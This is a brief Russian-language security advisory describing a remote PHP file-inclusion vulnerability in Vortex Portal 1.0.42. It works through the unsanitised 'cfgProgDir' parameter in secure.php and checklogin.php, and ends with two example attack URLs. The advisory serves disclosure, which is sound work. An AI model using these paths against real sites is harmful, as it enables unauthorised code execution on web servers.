Программа: Vortex Portal 1.0.42
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cfgProgDir» сценариями secure.php и checklogin.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
/path/admincp/auth/secure.php?cfgProgDir=
/path/admincp/auth/checklogin.php?cfgProgDir=
